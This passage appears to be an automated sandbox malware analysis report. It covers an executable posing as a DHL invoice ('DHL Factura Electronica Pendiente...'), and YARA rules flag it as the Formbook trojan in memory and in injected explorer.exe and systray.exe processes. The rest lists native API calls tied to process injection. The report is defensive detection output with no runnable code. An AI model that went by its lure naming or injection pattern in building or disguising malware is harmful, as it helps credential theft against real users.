Source: 00000005.00000002.1532052892.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3884563234.0000000002F70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3884191751.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.3899090558.000000000E089000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1469792389.0000000003BF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7472, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: DHL Factura Electronica Pendiente documento No 04BB25083.exe PID: 7760, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 7928, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: DHL Factura Electronica Pendiente documento No 04BB25083.exe

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041A350 NtCreateFile,	5_2_0041A350
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041A400 NtReadFile,	5_2_0041A400
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041A480 NtClose,	5_2_0041A480
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041A530 NtAllocateVirtualMemory,	5_2_0041A530
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041A47C NtClose,	5_2_0041A47C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041A52A NtAllocateVirtualMemory,	5_2_0041A52A
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_01982BF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982B60 NtClose,LdrInitializeThunk,	5_2_01982B60
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982AD0 NtReadFile,LdrInitializeThunk,	5_2_01982AD0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982DD0 NtDelayExecution,LdrInitializeThunk,	5_2_01982DD0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01982DF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_01982D10
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_01982D30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_01982CA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_01982C70
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982F90 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_01982F90
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982FB0 NtResumeThread,LdrInitializeThunk,	5_2_01982FB0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982FE0 NtCreateFile,LdrInitializeThunk,	5_2_01982FE0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982F30 NtCreateSection,LdrInitializeThunk,	5_2_01982F30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_01982E80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_01982EA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01984340 NtSetContextThread,	5_2_01984340
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01984650 NtSuspendThread,	5_2_01984650
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982B80 NtQueryInformationFile,	5_2_01982B80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982BA0 NtEnumerateValueKey,	5_2_01982BA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982BE0 NtQueryValueKey,	5_2_01982BE0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982AB0 NtWaitForSingleObject,	5_2_01982AB0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982AF0 NtWriteFile,	5_2_01982AF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982DB0 NtEnumerateKey,	5_2_01982DB0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982D00 NtSetInformationFile,	5_2_01982D00
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982CC0 NtQueryVirtualMemory,	5_2_01982CC0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982CF0 NtOpenProcess,	5_2_01982CF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982C00 NtQueryInformationProcess,	5_2_01982C00
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982C60 NtCreateKey,	5_2_01982C60
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982FA0 NtQuerySection,	5_2_01982FA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982F60 NtCreateProcessEx,	5_2_01982F60
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982EE0 NtQueueApcThread,	5_2_01982EE0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01982E30 NtWriteVirtualMemory,	5_2_01982E30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01983090 NtSetValueKey,	5_2_01983090
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01983010 NtOpenDirectoryObject,	5_2_01983010
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019835C0 NtCreateMutant,	5_2_019835C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019839B0 NtGetContextThread,	5_2_019839B0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01983D10 NtOpenProcessToken,	5_2_01983D10
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01983D70 NtOpenThread,	5_2_01983D70
Source: C:\Windows\explorer.exe	Code function: 6_2_0E072E12 NtProtectVirtualMemory,	6_2_0E072E12
Source: C:\Windows\explorer.exe	Code function: 6_2_0E071232 NtCreateFile,	6_2_0E071232
Source: C:\Windows\explorer.exe	Code function: 6_2_0E072E0A NtProtectVirtualMemory,	6_2_0E072E0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_04CF2CA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2C60 NtCreateKey,LdrInitializeThunk,	7_2_04CF2C60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_04CF2C70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_04CF2DD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_04CF2DF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_04CF2D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_04CF2EA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2FE0 NtCreateFile,LdrInitializeThunk,	7_2_04CF2FE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2F30 NtCreateSection,LdrInitializeThunk,	7_2_04CF2F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2AD0 NtReadFile,LdrInitializeThunk,	7_2_04CF2AD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_04CF2BE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_04CF2BF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2B60 NtClose,LdrInitializeThunk,	7_2_04CF2B60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF35C0 NtCreateMutant,LdrInitializeThunk,	7_2_04CF35C0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF4650 NtSuspendThread,	7_2_04CF4650
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF4340 NtSetContextThread,	7_2_04CF4340
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2CC0 NtQueryVirtualMemory,	7_2_04CF2CC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2CF0 NtOpenProcess,	7_2_04CF2CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2C00 NtQueryInformationProcess,	7_2_04CF2C00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2DB0 NtEnumerateKey,	7_2_04CF2DB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2D00 NtSetInformationFile,	7_2_04CF2D00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2D30 NtUnmapViewOfSection,	7_2_04CF2D30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2EE0 NtQueueApcThread,	7_2_04CF2EE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2E80 NtReadVirtualMemory,	7_2_04CF2E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2E30 NtWriteVirtualMemory,	7_2_04CF2E30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2F90 NtProtectVirtualMemory,	7_2_04CF2F90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2FA0 NtQuerySection,	7_2_04CF2FA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2FB0 NtResumeThread,	7_2_04CF2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2F60 NtCreateProcessEx,	7_2_04CF2F60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2AF0 NtWriteFile,	7_2_04CF2AF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2AB0 NtWaitForSingleObject,	7_2_04CF2AB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2B80 NtQueryInformationFile,	7_2_04CF2B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF2BA0 NtEnumerateValueKey,	7_2_04CF2BA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF3090 NtSetValueKey,	7_2_04CF3090
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF3010 NtOpenDirectoryObject,	7_2_04CF3010
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF3D70 NtOpenThread,	7_2_04CF3D70
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF3D10 NtOpenProcessToken,	7_2_04CF3D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_04CF39B0 NtGetContextThread,	7_2_04CF39B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1A350 NtCreateFile,	7_2_02D1A350
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1A480 NtClose,	7_2_02D1A480
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1A400 NtReadFile,	7_2_02D1A400
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1A530 NtAllocateVirtualMemory,	7_2_02D1A530
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1A47C NtClose,	7_2_02D1A47C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 7_2_02D1A52A NtAllocateVirtualMemory,	7_2_02D1A52A

Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_00C2DE9C	0_2_00C2DE9C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C5C5A0	0_2_06C5C5A0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C57D30	0_2_06C57D30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C5B5C0	0_2_06C5B5C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C50040	0_2_06C50040
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C50006	0_2_06C50006
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_07000B30	0_2_07000B30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_07005818	0_2_07005818
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_070014E0	0_2_070014E0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 0_2_06C58018	0_2_06C58018
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041E84B	5_2_0041E84B
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041D9B6	5_2_0041D9B6
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041EB6E	5_2_0041EB6E
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041DCA1	5_2_0041DCA1
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00402D87	5_2_00402D87
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00409E4C	5_2_00409E4C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00409E50	5_2_00409E50
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0041D770	5_2_0041D770
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A101AA	5_2_01A101AA
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A081CC	5_2_01A081CC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EA118	5_2_019EA118
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940100	5_2_01940100
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D8158	5_2_019D8158
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E2000	5_2_019E2000
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A103E6	5_2_01A103E6
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0195E3F0	5_2_0195E3F0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0A352	5_2_01A0A352
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019D02C0	5_2_019D02C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F0274	5_2_019F0274
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A10591	5_2_01A10591
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950535	5_2_01950535
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019FE4F6	5_2_019FE4F6
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F4420	5_2_019F4420
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A02446	5_2_01A02446
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194C7C0	5_2_0194C7C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01974750	5_2_01974750
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950770	5_2_01950770
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196C6E0	5_2_0196C6E0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A1A9A6	5_2_01A1A9A6
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019529A0	5_2_019529A0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01966962	5_2_01966962
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019368B8	5_2_019368B8
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0197E8F0	5_2_0197E8F0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01952840	5_2_01952840
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0195A840	5_2_0195A840
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A06BD7	5_2_01A06BD7
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0AB40	5_2_01A0AB40
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194EA80	5_2_0194EA80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01968DBF	5_2_01968DBF
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0194ADE0	5_2_0194ADE0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019ECD1F	5_2_019ECD1F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0195AD00	5_2_0195AD00
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F0CB5	5_2_019F0CB5
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01940CF2	5_2_01940CF2
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950C00	5_2_01950C00
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019CEFA0	5_2_019CEFA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01942FC8	5_2_01942FC8
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0195CFE0	5_2_0195CFE0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01970F30	5_2_01970F30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F2F30	5_2_019F2F30
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01992F28	5_2_01992F28
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C4F40	5_2_019C4F40
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01962E90	5_2_01962E90
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0CE93	5_2_01A0CE93
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0EEDB	5_2_01A0EEDB
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0EE26	5_2_01A0EE26
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01950E59	5_2_01950E59
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0195B1B0	5_2_0195B1B0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A1B16B	5_2_01A1B16B
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193F172	5_2_0193F172
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0198516C	5_2_0198516C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0F0E0	5_2_01A0F0E0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A070E9	5_2_01A070E9
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019FF0CC	5_2_019FF0CC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019570C0	5_2_019570C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0199739A	5_2_0199739A
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0132D	5_2_01A0132D
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0193D34C	5_2_0193D34C
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019552A0	5_2_019552A0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196B2C0	5_2_0196B2C0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F12ED	5_2_019F12ED
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019ED5B0	5_2_019ED5B0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A07571	5_2_01A07571
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0F43F	5_2_01A0F43F
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01941460	5_2_01941460
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0F7B0	5_2_01A0F7B0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A016CC	5_2_01A016CC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019E5910	5_2_019E5910
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01959950	5_2_01959950
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196B950	5_2_0196B950
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019538E0	5_2_019538E0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019BD800	5_2_019BD800
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0196FB80	5_2_0196FB80
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_0198DBF9	5_2_0198DBF9
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019C5BF0	5_2_019C5BF0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01A0FB76	5_2_01A0FB76
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019EDAAC	5_2_019EDAAC
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_01995AA0	5_2_01995AA0
Source: C:\Users\user\Desktop\DHL Factura Electronica Pendiente documento No 04BB25083.exe	Code function: 5_2_019F1AA3	5_2_019F1AA3
